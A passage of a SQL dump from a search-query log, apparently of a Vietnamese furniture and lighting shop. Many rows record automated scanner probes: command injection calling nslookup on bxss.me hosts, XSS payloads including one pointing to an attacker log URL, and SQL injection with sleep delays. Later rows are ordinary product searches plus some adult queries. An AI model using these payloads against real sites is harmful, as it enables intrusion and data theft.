22:15:07'),(13328,'(nslookup hitjvdjnowzra41ab7.bxss.me||perl -e \"gethostbyname(\'hitjvdjnowzra41ab7.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 22:15:10'),(13336,'$(nslookup hitigvozjcxgs71432.bxss.me||perl -e \"gethostbyname(\'hitigvozjcxgs71432.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 22:15:18'),(13345,'&(nslookup hitycngpukdnm4ae2d.bxss.me||perl -e \"gethostbyname(\'hitycngpukdnm4ae2d.bxss.me\')\")&\'\\\"`0&(nslookup hitycngpukdnm4ae2d',0,1,NULL,9,1,1,0,'2021-10-31 22:15:27'),(13353,'|(nslookup hitzmrqkippfu50543.bxss.me||perl -e \"gethostbyname(\'hitzmrqkippfu50543.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 22:15:34'),(13357,'\'.gethostbyname(lc(\'hitzk\'.\'kovobwgddbce8.bxss.me.\')).\'A\'.chr(67).chr(hex(\'58\')).chr(103).chr(77).chr(99).chr(81).\'',3,1,NULL,9,1,1,0,'2021-10-31 22:15:38'),(13359,'`(nslookup hitrrfsbxqaojcf715.bxss.me||perl -e \"gethostbyname(\'hitrrfsbxqaojcf715.bxss.me\')\")`',0,1,NULL,9,1,1,0,'2021-10-31 22:15:38'),(13365,'\".gethostbyname(lc(\"hitaa\".\"whcqwxif0c7b8.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(115).chr(73).chr(101).chr(74).\"',0,1,NULL,9,1,1,0,'2021-10-31 22:15:43'),(13369,';(nslookup hitddlxejtcgp1a853.bxss.me||perl -e \"gethostbyname(\'hitddlxejtcgp1a853.bxss.me\')\")|(nslookup hitddlxejtcgp1a853.bxss.',0,1,NULL,9,1,1,0,'2021-10-31 22:15:45'),(13391,'\"+\"A\".concat(70-3).concat(22*4).concat(118).concat(65).concat(115).concat(85)+(require\"socket\"\nSocket.gethostbyname(\"hitfn\"+\"kyr',0,1,NULL,9,1,1,0,'2021-10-31 22:16:04'),(13399,'\'+\'A\'.concat(70-3).concat(22*4).concat(117).concat(81).concat(100).concat(89)+(require\'socket\'\nSocket.gethostbyname(\'hitau\'+\'kit',27,1,NULL,9,1,1,0,'2021-10-31 22:16:10'),(13452,'956915',0,1,NULL,9,1,1,0,'2021-10-31 22:16:50'),(13578,'thất\'\"()&%<acx><ScRiPt >vtja(9937)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 22:20:08'),(13580,'\'\"()&%<acx><ScRiPt >vtja(9865)</ScRiPt>',0,1,NULL,9,1,1,0,'2021-10-31 22:20:10'),(13582,'thất9331155',0,1,NULL,9,1,1,0,'2021-10-31 22:20:14'),(13584,'thất9331155<',0,1,NULL,9,1,1,0,'2021-10-31 22:20:17'),(13586,'acu5537＜s1﹥s2ʺs3ʹuca5537',0,1,NULL,9,1,1,0,'2021-10-31 22:20:21'),(13588,'acux6280??z1??z2a?bcxuca6280',0,1,NULL,9,1,1,0,'2021-10-31 22:20:25'),(13610,'acu7241＜s1﹥s2ʺs3ʹuca7241',0,1,NULL,9,1,1,0,'2021-10-31 22:21:08'),(13612,'acux5411??z1??z2a?bcxuca5411',0,1,NULL,9,1,1,0,'2021-10-31 22:21:11'),(13634,'acu1969＜s1﹥s2ʺs3ʹuca1969',0,1,NULL,9,1,1,0,'2021-10-31 22:21:44'),(13636,'acux6030??z1??z2a?bcxuca6030',0,1,NULL,9,1,1,0,'2021-10-31 22:21:47'),(13658,'acu2443＜s1﹥s2ʺs3ʹuca2443',0,1,NULL,9,1,1,0,'2021-10-31 22:22:29'),(13660,'acux10866??z1??z2a?bcxuca10866',0,1,NULL,9,1,1,0,'2021-10-31 22:22:35'),(13682,'thất\"onmouseover=vtja(97852)\"',2,1,NULL,9,1,1,0,'2021-10-31 22:23:34'),(13684,'thất\" lNgH=vtja([!+!]) Tkc=\"',2,1,NULL,9,1,1,0,'2021-10-31 22:23:40'),(13686,'thất\\u0022onmouseover=vtja(97263)\\u0022',2,1,NULL,9,1,1,0,'2021-10-31 22:23:46'),(13688,'%74%68%E1%BA%A5%74%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%76%74%6A%61%28%39%33%34%38%34%29%22',20,1,NULL,9,1,1,0,'2021-10-31 22:23:53'),(13690,'?\"onmouseover=vtja(96575)//',0,1,NULL,9,1,1,0,'2021-10-31 22:24:01'),(13692,'thất\"sTYLe=\'acu:Expre/**/SSion(vtja(9927))\'bad=\"',2,1,NULL,9,1,1,0,'2021-10-31 22:24:09'),(13694,'thất\"><script>vtja(9549)</script>',2,1,NULL,9,1,1,0,'2021-10-31 22:24:16'),(13696,'thất</title><ScRiPt >vtja(9487)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 22:24:22'),(13698,'thất<ScRiPt >vtja(9994)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 22:24:32'),(13700,'thất<WWUSZD>TNG0K[!+!]</WWUSZD>',2,1,NULL,9,1,1,0,'2021-10-31 22:24:39'),(13704,'thất<script>vtja(9465)</script>',2,1,NULL,9,1,1,0,'2021-10-31 22:24:45'),(13706,'thất<ScR<ScRiPt>IpT>vtja(9639)</sCr<ScRiPt>IpT>',2,1,NULL,9,1,1,0,'2021-10-31 22:24:51'),(13708,'thất<ScRiPt \r\n>vtja(9953)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 22:24:59'),(13710,'thất<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9532></ScRiPt>',17,1,NULL,9,1,1,0,'2021-10-31 22:25:08'),(13712,'thất<\0ScRiPt \r\n>vtja(9135)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 22:25:13'),(13714,'thất<svg	\n\r?\0onload=vtja(9844);>',2,1,NULL,9,1,1,0,'2021-10-31 22:25:18'),(13716,'thất<isindex type=image src=1 onerror=vtja(9060)>',2,1,NULL,9,1,1,0,'2021-10-31 22:25:23'),(13718,'thất<iframe src=\'data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=\' invalid=\'9637\'>',2,1,NULL,9,1,1,0,'2021-10-31 22:25:28'),(13720,'thất<body onload=vtja(9952)>',2,1,NULL,9,1,1,0,'2021-10-31 22:25:34'),(13722,'thất<img src=//xss.bxss.me/t/dot.gif onload=vtja(9800)>',2,1,NULL,9,1,1,0,'2021-10-31 22:25:38'),(13724,'thất<img src=xyz OnErRor=vtja(9570)>',2,1,NULL,9,1,1,0,'2021-10-31 22:25:43'),(13726,'thất<img/src=\">\" onerror=alert(9910)>',2,1,NULL,9,1,1,0,'2021-10-31 22:25:49'),(13728,'%74%68%E1%BA%A5%74%3C%53%63%52%69%50%74%20%3E%76%74%6A%61%289899%29%3C%2F%73%43%72%69%70%54%3E',10,1,NULL,9,1,1,0,'2021-10-31 22:25:53'),(13732,'thất\\u003CScRiPt\\vtja(9849)\\u003C/sCripT\\u003E',2,1,NULL,9,1,1,0,'2021-10-31 22:26:02'),(13736,'thất&lt;ScRiPt&gt;vtja(9553)&lt;/sCripT&gt;',2,1,NULL,9,1,1,0,'2021-10-31 22:26:10'),(13740,'?<img acu onmouseover=vtja(94031) //?>',0,1,NULL,9,1,1,0,'2021-10-31 22:26:17'),(13744,'thất<input autofocus onfocus=vtja(9321)>',2,1,NULL,9,1,1,0,'2021-10-31 22:26:25'),(13750,'thất}body{acu:Expre/**/SSion(vtja(9294))}',2,1,NULL,9,1,1,0,'2021-10-31 22:26:46'),(13752,'thấtZnVZe\n<ScRiPt >vtja(9302)</ScRiPt>',0,1,NULL,9,1,1,0,'2021-10-31 22:26:49'),(13754,'thất<WWBQOB>MP1QV[!+!]</WWBQOB>',2,1,NULL,9,1,1,0,'2021-10-31 22:26:54'),(13756,'thất<ifRAme sRc=9907.com></IfRamE>',2,1,NULL,9,1,1,0,'2021-10-31 22:26:57'),(13758,'thất<aiNk7sB x=9213>',2,1,NULL,9,1,1,0,'2021-10-31 22:27:03'),(13760,'thất<img sRc=\'http://attacker-9836/log.php?',2,1,NULL,9,1,1,0,'2021-10-31 22:27:11'),(13764,'thất<aeAU5NU<',2,1,NULL,9,1,1,0,'2021-10-31 22:27:15'),(13774,'LD7zpe4R',0,1,NULL,9,1,1,0,'2021-10-31 22:32:16'),(13776,'thất\' AND 2*3*8=6*8 AND \'GDyw\'=\'GDyw',37,1,NULL,9,1,1,0,'2021-10-31 22:32:23'),(13778,'thất\" AND 2*3*8=6*8 AND \"12nc\"=\"12nc',37,1,NULL,9,1,1,0,'2021-10-31 22:32:28'),(13780,'thất%\' AND 2*3*8=6*8 AND \'4JZR\'!=\'4JZR%',37,1,NULL,9,1,1,0,'2021-10-31 22:32:33'),(13782,'-1 OR 2+311-311-1=0+0+0+1',19,1,NULL,9,1,1,0,'2021-10-31 22:32:38'),(13784,'-1 OR 3+311-311-1=0+0+0+1',26,1,NULL,9,1,1,0,'2021-10-31 22:32:45'),(13786,'-1 OR 3*2<(0+5+311-311)',48,1,NULL,9,1,1,0,'2021-10-31 22:32:50'),(13788,'-1 OR 3*2>(0+5+311-311)',48,1,NULL,9,1,1,0,'2021-10-31 22:32:55'),(13822,'qtSAMLUB\'; waitfor delay \'0:0:15\' --',2,1,NULL,9,1,1,0,'2021-10-31 22:44:34'),(13824,'qAs56zTi',0,1,NULL,9,1,1,0,'2021-10-31 22:45:00'),(13826,'thất\' AND 2*3*8=6*8 AND \'8UW9\'=\'8UW9',37,1,NULL,9,1,1,0,'2021-10-31 22:45:08'),(13828,'thất\" AND 2*3*8=6*8 AND \"xXVQ\"=\"xXVQ',37,1,NULL,9,1,1,0,'2021-10-31 22:45:15'),(13830,'thất%\' AND 2*3*8=6*8 AND \'LcqN\'!=\'LcqN%',37,1,NULL,9,1,1,0,'2021-10-31 22:45:23'),(13832,'-1 OR 2+778-778-1=0+0+0+1',19,1,NULL,9,1,1,0,'2021-10-31 22:45:31'),(13834,'-1 OR 3+778-778-1=0+0+0+1',26,1,NULL,9,1,1,0,'2021-10-31 22:45:38'),(13836,'-1 OR 3*2<(0+5+778-778)',48,1,NULL,9,1,1,0,'2021-10-31 22:45:48'),(13838,'-1 OR 3*2>(0+5+778-778)',48,1,NULL,9,1,1,0,'2021-10-31 22:45:54'),(13842,'zXnO6Cxt\' OR 451=(SELECT 451 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 22:46:48'),(13846,'yTAcOhO3\') OR 27=(SELECT 27 FROM PG_SLEEP(15))--',3,1,NULL,9,1,1,0,'2021-10-31 22:48:51'),(13850,'1VvFixBn\')) OR 671=(SELECT 671 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 22:50:57'),(13860,'@@IRDHs',0,1,NULL,9,1,1,0,'2021-10-31 22:53:10'),(13864,'response.write(9626517*9249834)',0,1,NULL,9,1,1,0,'2021-10-31 22:53:54'),(13866,'*:*&fl=*,id:[value%20v=\'\\u0036\\u0036\\u003698733280\\u0039\\u0039\\u0039\'],name:[value%20v=\'\\u0036\\u0036\\u003698733280\\u0039\\u0039\\u',10,1,NULL,9,1,1,0,'2021-10-31 22:53:55'),(13868,'1lBmzEPLSO',0,1,NULL,9,1,1,0,'2021-10-31 22:53:59'),(13870,'\'+response.write(9626517*9249834)+\'',0,1,NULL,9,1,1,0,'2021-10-31 22:54:03'),(13872,'aaa&shards=http://hitcxxvpfdbwg07e04.bxss.me/solr',0,1,NULL,9,1,1,0,'2021-10-31 22:54:03'),(13874,'echo icguqr$()\\ vjmwwg\\nz^xyu||a #\' &echo icguqr$()\\ vjmwwg\\nz^xyu||a #|\" &echo icguqr$()\\ vjmwwg\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 22:54:06'),(13876,'e6TdXLs6',0,1,NULL,9,1,1,0,'2021-10-31 22:54:07'),(13878,'\"+response.write(9626517*9249834)+\"',0,1,NULL,9,1,1,0,'2021-10-31 22:54:08'),(13882,'&echo ghozti$()\\ qtmvim\\nz^xyu||a #\' &echo ghozti$()\\ qtmvim\\nz^xyu||a #|\" &echo ghozti$()\\ qtmvim\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 22:54:14'),(13890,'|echo hthnmb$()\\ znpvjs\\nz^xyu||a #\' |echo hthnmb$()\\ znpvjs\\nz^xyu||a #|\" |echo hthnmb$()\\ znpvjs\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 22:54:19'),(13894,'${9999731+9999208}',0,1,NULL,9,1,1,0,'2021-10-31 22:54:21'),(13900,'(nslookup hitqmrvkfcmgs3a1ad.bxss.me||perl -e \"gethostbyname(\'hitqmrvkfcmgs3a1ad.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 22:54:25'),(13907,'thất&n974255=v918812',2,1,NULL,9,1,1,0,'2021-10-31 22:54:33'),(13913,'$(nslookup hitgrqivyqxgodcd72.bxss.me||perl -e \"gethostbyname(\'hitgrqivyqxgodcd72.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 22:54:35'),(13917,'\'.gethostbyname(lc(\'hitpy\'.\'rpfdjdjj2608d.bxss.me.\')).\'A\'.chr(67).chr(hex(\'58\')).chr(119).chr(81).chr(102).chr(76).\'',4,1,NULL,9,1,1,0,'2021-10-31 22:54:39'),(13925,'&(nslookup hitclrxvcltyi56390.bxss.me||perl -e \"gethostbyname(\'hitclrxvcltyi56390.bxss.me\')\")&\'\\\"`0&(nslookup hitclrxvcltyi56390',0,1,NULL,9,1,1,0,'2021-10-31 22:54:45'),(13929,'\"+\"A\".concat(70-3).concat(22*4).concat(97).concat(85).concat(111).concat(73)+(require\"socket\"\nSocket.gethostbyname(\"hitvz\"+\"rbks',0,1,NULL,9,1,1,0,'2021-10-31 22:54:47'),(13931,'\".gethostbyname(lc(\"hitvm\".\"xthragcrbba81.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(110).chr(78).chr(118).chr(76).\"',0,1,NULL,9,1,1,0,'2021-10-31 22:54:48'),(13937,'|(nslookup hitiqikxfdkxr1d54e.bxss.me||perl -e \"gethostbyname(\'hitiqikxfdkxr1d54e.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 22:54:52'),(13941,'\'+\'A\'.concat(70-3).concat(22*4).concat(115).concat(88).concat(99).concat(81)+(require\'socket\'\nSocket.gethostbyname(\'hityd\'+\'chtj',26,1,NULL,9,1,1,0,'2021-10-31 22:54:56'),(13949,'`(nslookup hityydotdmusw14c39.bxss.me||perl -e \"gethostbyname(\'hityydotdmusw14c39.bxss.me\')\")`',0,1,NULL,9,1,1,0,'2021-10-31 22:55:01'),(13958,';(nslookup hitbgffihqcmr6f3d3.bxss.me||perl -e \"gethostbyname(\'hitbgffihqcmr6f3d3.bxss.me\')\")|(nslookup hitbgffihqcmr6f3d3.bxss.',0,1,NULL,9,1,1,0,'2021-10-31 22:55:08'),(13960,'933079',0,1,NULL,9,1,1,0,'2021-10-31 22:55:11'),(13962,'thất\'\"()&%<acx><ScRiPt >PXQb(9797)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 22:55:13'),(13972,'\'\"()&%<acx><ScRiPt >PXQb(9531)</ScRiPt>',0,1,NULL,9,1,1,0,'2021-10-31 22:55:20'),(13980,'thất9668156',0,1,NULL,9,1,1,0,'2021-10-31 22:55:30'),(13982,'thất9668156<',0,1,NULL,9,1,1,0,'2021-10-31 22:55:35'),(13984,'acu3872＜s1﹥s2ʺs3ʹuca3872',0,1,NULL,9,1,1,0,'2021-10-31 22:55:40'),(13986,'acux10587??z1??z2a?bcxuca10587',0,1,NULL,9,1,1,0,'2021-10-31 22:55:46'),(14010,'acu9528＜s1﹥s2ʺs3ʹuca9528',0,1,NULL,9,1,1,0,'2021-10-31 22:56:40'),(14012,'acux4977??z1??z2a?bcxuca4977',0,1,NULL,9,1,1,0,'2021-10-31 22:56:44'),(14032,'acu1529＜s1﹥s2ʺs3ʹuca1529',0,1,NULL,9,1,1,0,'2021-10-31 22:57:19'),(14036,'acux9164??z1??z2a?bcxuca9164',0,1,NULL,9,1,1,0,'2021-10-31 22:57:24'),(14042,'Rc0cAaV2\'; waitfor delay \'0:0:15\' --',2,1,NULL,9,1,1,0,'2021-10-31 22:57:38'),(14058,'acu3456＜s1﹥s2ʺs3ʹuca3456',0,1,NULL,9,1,1,0,'2021-10-31 22:58:25'),(14060,'acux5086??z1??z2a?bcxuca5086',0,1,NULL,9,1,1,0,'2021-10-31 22:58:31'),(14080,'LugZnpx2',0,1,NULL,9,1,1,0,'2021-10-31 22:59:32'),(14082,'acu9430＜s1﹥s2ʺs3ʹuca9430',0,1,NULL,9,1,1,0,'2021-10-31 22:59:33'),(14084,'thất\' AND 2*3*8=6*8 AND \'oKHf\'=\'oKHf',37,1,NULL,9,1,1,0,'2021-10-31 22:59:38'),(14086,'acux8981??z1??z2a?bcxuca8981',0,1,NULL,9,1,1,0,'2021-10-31 22:59:41'),(14088,'thất\" AND 2*3*8=6*8 AND \"YzCs\"=\"YzCs',37,1,NULL,9,1,1,0,'2021-10-31 22:59:45'),(14092,'thất%\' AND 2*3*8=6*8 AND \'rcYe\'!=\'rcYe%',37,1,NULL,9,1,1,0,'2021-10-31 22:59:52'),(14094,'YTVQ6wyB\' OR 216=(SELECT 216 FROM PG_SLEEP(15))--',4,1,NULL,9,1,1,0,'2021-10-31 22:59:53'),(14100,'-1 OR 2+474-474-1=0+0+0+1',19,1,NULL,9,1,1,0,'2021-10-31 23:00:00'),(14102,'-1 OR 3+474-474-1=0+0+0+1',26,1,NULL,9,1,1,0,'2021-10-31 23:00:07'),(14106,'-1 OR 3*2<(0+5+474-474)',48,1,NULL,9,1,1,0,'2021-10-31 23:00:14'),(14112,'-1 OR 3*2>(0+5+474-474)',48,1,NULL,9,1,1,0,'2021-10-31 23:00:22'),(14122,'thất\"onmouseover=PXQb(90222)\"',2,1,NULL,9,1,1,0,'2021-10-31 23:00:41'),(14124,'thất\" ExyB=PXQb([!+!]) weS=\"',2,1,NULL,9,1,1,0,'2021-10-31 23:00:45'),(14126,'thất\\u0022onmouseover=PXQb(94573)\\u0022',2,1,NULL,9,1,1,0,'2021-10-31 23:00:49'),(14128,'%74%68%E1%BA%A5%74%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%50%58%51%62%28%39%35%37%39%34%29%22',20,1,NULL,9,1,1,0,'2021-10-31 23:00:59'),(14130,'?\"onmouseover=PXQb(97125)//',0,1,NULL,9,1,1,0,'2021-10-31 23:01:05'),(14132,'thất\"sTYLe=\'acu:Expre/**/SSion(PXQb(9604))\'bad=\"',2,1,NULL,9,1,1,0,'2021-10-31 23:01:10'),(14134,'thất\"><script>PXQb(9871)</script>',2,1,NULL,9,1,1,0,'2021-10-31 23:01:17'),(14136,'thất</title><ScRiPt >PXQb(9667)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 23:01:23'),(14138,'thất<ScRiPt >PXQb(9436)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 23:01:27'),(14140,'thất<WFTVIT>69DYP[!+!]</WFTVIT>',2,1,NULL,9,1,1,0,'2021-10-31 23:01:33'),(14142,'thất<script>PXQb(9120)</script>',2,1,NULL,9,1,1,0,'2021-10-31 23:01:38'),(14144,'thất<ScR<ScRiPt>IpT>PXQb(9753)</sCr<ScRiPt>IpT>',2,1,NULL,9,1,1,0,'2021-10-31 23:01:47'),(14146,'thất<ScRiPt \r\n>PXQb(9731)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 23:01:52'),(14148,'ZvvLX8C2\') OR 707=(SELECT 707 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 23:01:55'),(14150,'thất<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9609></ScRiPt>',17,1,NULL,9,1,1,0,'2021-10-31 23:01:57'),(14152,'thất<\0ScRiPt \r\n>PXQb(9299)</ScRiPt>',2,1,NULL,9,1,1,0,'2021-10-31 23:02:02'),(14154,'thất<svg	\n\r?\0onload=PXQb(9232);>',2,1,NULL,9,1,1,0,'2021-10-31 23:02:10'),(14156,'thất<isindex type=image src=1 onerror=PXQb(9125)>',2,1,NULL,9,1,1,0,'2021-10-31 23:02:15'),(14158,'thất<iframe src=\'data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=\' invalid=\'9041\'>',2,1,NULL,9,1,1,0,'2021-10-31 23:02:21'),(14162,'thất<body onload=PXQb(9257)>',2,1,NULL,9,1,1,0,'2021-10-31 23:02:28'),(14164,'thất<img src=//xss.bxss.me/t/dot.gif onload=PXQb(9726)>',2,1,NULL,9,1,1,0,'2021-10-31 23:02:34'),(14166,'thất<img src=xyz OnErRor=PXQb(9058)>',2,1,NULL,9,1,1,0,'2021-10-31 23:02:41'),(14168,'thất<img/src=\">\" onerror=alert(9975)>',2,1,NULL,9,1,1,0,'2021-10-31 23:02:46'),(14170,'%74%68%E1%BA%A5%74%3C%53%63%52%69%50%74%20%3E%50%58%51%62%289121%29%3C%2F%73%43%72%69%70%54%3E',12,1,NULL,9,1,1,0,'2021-10-31 23:02:51'),(14172,'thất\\u003CScRiPt\\PXQb(9990)\\u003C/sCripT\\u003E',2,1,NULL,9,1,1,0,'2021-10-31 23:03:04'),(14174,'thất&lt;ScRiPt&gt;PXQb(9935)&lt;/sCripT&gt;',2,1,NULL,9,1,1,0,'2021-10-31 23:03:10'),(14176,'?<img acu onmouseover=PXQb(92851) //?>',0,1,NULL,9,1,1,0,'2021-10-31 23:03:20'),(14178,'thất<input autofocus onfocus=PXQb(9614)>',2,1,NULL,9,1,1,0,'2021-10-31 23:03:27'),(14184,'thất}body{acu:Expre/**/SSion(PXQb(9925))}',2,1,NULL,9,1,1,0,'2021-10-31 23:03:48'),(14186,'thấtQwzX9\n<ScRiPt >PXQb(9768)</ScRiPt>',0,1,NULL,9,1,1,0,'2021-10-31 23:03:53'),(14188,'thất<WDDXQU>RYGTS[!+!]</WDDXQU>',2,1,NULL,9,1,1,0,'2021-10-31 23:03:59'),(14190,'thất<ifRAme sRc=9917.com></IfRamE>',2,1,NULL,9,1,1,0,'2021-10-31 23:04:09'),(14192,'w3lN6gON\')) OR 922=(SELECT 922 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 23:04:13'),(14194,'thất<aZHCb2e x=9232>',2,1,NULL,9,1,1,0,'2021-10-31 23:04:14'),(14196,'thất<img sRc=\'http://attacker-9289/log.php?',2,1,NULL,9,1,1,0,'2021-10-31 23:04:22'),(14198,'thất<a2iBWMX<',2,1,NULL,9,1,1,0,'2021-10-31 23:04:27'),(14208,'@@JWDH2',0,1,NULL,9,1,1,0,'2021-10-31 23:05:55'),(14216,'qTRquXpZ\'; waitfor delay \'0:0:15\' --',2,1,NULL,9,1,1,0,'2021-10-31 23:11:15'),(14218,'5jWw453O\' OR 121=(SELECT 121 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 23:13:16'),(14220,'hya5Qoyg\') OR 803=(SELECT 803 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 23:15:02'),(14222,'e8n7jwww\')) OR 429=(SELECT 429 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 23:16:48'),(14230,'@@RcCrD',0,1,NULL,9,1,1,0,'2021-10-31 23:18:58'),(14234,'Bt2',2,4,NULL,9,1,1,0,'2022-01-05 01:48:01'),(14238,'nou',0,1,NULL,9,1,1,0,'2021-11-06 07:19:30'),(14240,'nougichi',0,2,NULL,9,1,1,0,'2021-11-06 07:19:31'),(14244,'noguchi',1,1,NULL,9,1,1,0,'2021-11-06 07:19:33'),(14246,'bt4',0,6,NULL,9,1,1,0,'2022-01-05 01:49:30'),(14252,'bab',0,1,NULL,9,1,1,0,'2021-11-06 08:38:14'),(14256,'ban tra',144,17,NULL,9,1,1,0,'2022-01-07 16:18:28'),(14261,'ban tra Bt4',141,1,NULL,9,1,1,0,'2021-11-06 08:38:52'),(14263,'ban tra kim cuong',146,2,NULL,9,1,1,0,'2021-11-06 08:39:06'),(14267,'Đèn Thả Khung Sắt Hình Học',54,1,NULL,9,1,1,0,'2021-11-08 09:06:12'),(14271,'Đèn Thả Khung Sắt Hình Học - Chiếc',54,1,NULL,9,1,1,0,'2021-11-10 04:00:29'),(14275,'Đèn Thả PHân Tủ',59,2,NULL,9,1,1,0,'2021-11-15 08:33:44'),(14277,'DTH076',0,2,NULL,9,1,1,0,'2021-11-15 08:33:31'),(14281,'đèn',59,5,NULL,9,1,1,0,'2022-01-09 07:55:31'),(14287,'ne',8,3,NULL,9,1,1,0,'2021-11-24 04:37:26'),(14289,'nelson',1,1,NULL,9,1,1,0,'2021-11-15 08:48:20'),(14291,'te',1,1,NULL,9,1,1,0,'2021-11-16 06:45:17'),(14297,'payment',1,18,NULL,9,1,1,0,'2022-01-05 04:45:25'),(14301,'payment tét',1,2,NULL,9,1,1,0,'2021-12-07 01:45:02'),(14303,'payment test',1,11,NULL,9,1,1,0,'2021-12-08 08:46:24'),(14328,'dc14',0,1,NULL,9,1,1,0,'2021-11-17 04:32:59'),(14330,'đèn chụm rọi',40,2,NULL,9,1,1,0,'2021-11-17 04:33:08'),(14334,'Đèn thả khung sắt đui giả gỗ',118,1,NULL,9,1,1,0,'2021-11-17 04:36:24'),(14337,'gosi',0,1,NULL,9,1,1,0,'2021-11-18 03:20:30'),(14339,'ói',0,1,NULL,9,1,1,0,'2021-11-18 03:20:32'),(14341,'rental',1,1,NULL,9,1,1,0,'2021-11-18 03:20:35'),(14343,'payment demo',1,2,NULL,9,1,1,0,'2022-01-07 04:27:15'),(14350,'kim cương',23,2,NULL,9,1,1,0,'2021-11-23 03:39:48'),(14354,'Vòi trộn REGAL 110 có bộ xả kéo',236,1,NULL,9,1,1,0,'2021-11-23 08:28:19'),(14363,'nee',0,1,NULL,9,1,1,0,'2021-11-24 04:37:25'),(14370,'Ghế ngoài trời',331,3,NULL,9,1,1,0,'2021-11-24 16:19:44'),(14376,'Vòi trộn REGAL 110',30,3,NULL,9,1,1,0,'2021-11-25 06:51:51'),(14384,'vòi trên regal 110',240,1,NULL,9,1,1,0,'2021-11-25 07:07:59'),(14387,'esso',1,3,NULL,9,1,1,0,'2021-12-17 08:50:48'),(14392,'blum',0,2,NULL,9,1,1,0,'2021-11-29 06:48:34'),(14396,'so',22,14,NULL,9,1,1,0,'2022-01-08 01:48:30'),(14398,'sof',0,3,NULL,9,1,1,0,'2022-01-01 05:08:59'),(14402,'sofa le',28,1,NULL,9,1,1,0,'2021-12-01 04:01:33'),(14404,'sofa leon',28,1,NULL,9,1,1,0,'2021-12-01 04:01:36'),(14406,'giường',10,15,NULL,9,1,1,0,'2022-01-08 13:26:58'),(14428,'bàn làm',270,2,NULL,9,1,1,0,'2021-12-17 08:15:30'),(14430,'bàn làm việc',293,20,NULL,9,1,1,0,'2022-01-01 14:56:12'),(14464,'phòng ngủ',277,2,NULL,9,1,1,0,'2021-12-03 07:43:05'),(14470,'Ghế',329,164,NULL,9,1,1,0,'2022-01-04 06:45:29'),(14472,'Ghế tr',343,1,NULL,9,1,1,0,'2021-12-03 22:54:51'),(14474,'Ghế trang',362,2,NULL,9,1,1,0,'2021-12-03 22:54:53'),(14478,'Ghế trang điểm',286,17,NULL,9,1,1,0,'2021-12-27 06:54:18'),(14508,'tủ giày',69,2,NULL,9,1,1,0,'2022-01-03 09:37:49'),(14514,'paymen',1,2,NULL,9,1,1,0,'2021-12-06 03:12:26'),(14538,'tủ 3 ngăn kéo',160,3,NULL,9,1,1,0,'2021-12-07 03:44:32'),(14559,'gi',29,1,NULL,9,1,1,0,'2021-12-07 09:25:22'),(14561,'giường tầng',10,1,NULL,9,1,1,0,'2021-12-07 09:25:24'),(14569,'kệ tv',15,8,NULL,9,1,1,0,'2022-01-08 02:09:40'),(14581,'payment te',1,1,NULL,9,1,1,0,'2021-12-08 08:58:15'),(14625,'Maryam jamali1363 photo',0,4,NULL,9,1,1,0,'2021-12-15 08:37:00'),(14632,'وی',0,1,NULL,9,1,1,0,'2021-12-11 15:26:47'),(14634,'ویدیو',0,1,NULL,9,1,1,0,'2021-12-11 15:26:49'),(14636,'ویدیو صفحه',0,2,NULL,9,1,1,0,'2021-12-11 15:26:58'),(14640,'ویدیو صفه',0,1,NULL,9,1,1,0,'2021-12-11 15:27:00'),(14642,'ویدیو صفه سیاه',0,2,NULL,9,1,1,0,'2021-12-11 15:27:03'),(14646,'ن',0,0,NULL,9,1,1,0,'2021-12-11 18:09:39'),(14647,'نيك',0,1,NULL,9,1,1,0,'2021-12-11 18:09:52'),(14655,'Grace',1,4,NULL,9,1,1,0,'2022-01-06 10:23:33'),(14657,'Vitalia',0,8,NULL,9,1,1,0,'2021-12-27 04:17:14'),(14660,'Porn',0,2,NULL,9,1,1,0,'2021-12-13 00:14:45'),(14662,'Se',3,1,NULL,9,1,1,0,'2021-12-13 00:14:24'),(14664,'Sex',0,2,NULL,9,1,1,0,'2021-12-13 00:14:26'),(14668,'Sex v',83,1,NULL,9,1,1,0,'2021-12-13 00:14:28'),(14670,'Sex vid',0,1,NULL,9,1,1,0,'2021-12-13 00:14:30'),(14672,'Sex vide',0,1,NULL,9,1,1,0,'2021-12-13 00:14:30'),(14674,'Sex video',0,3,NULL,9,1,1,0,'2021-12-13 00:14:33'),(14682,'Fil',0,1,NULL,9,1,1,0,'2021-12-13 02:40:42'),(14684,'Film',0,1,NULL,9,1,1,0,'2021-12-13 02:40:43'),(14686,'Film 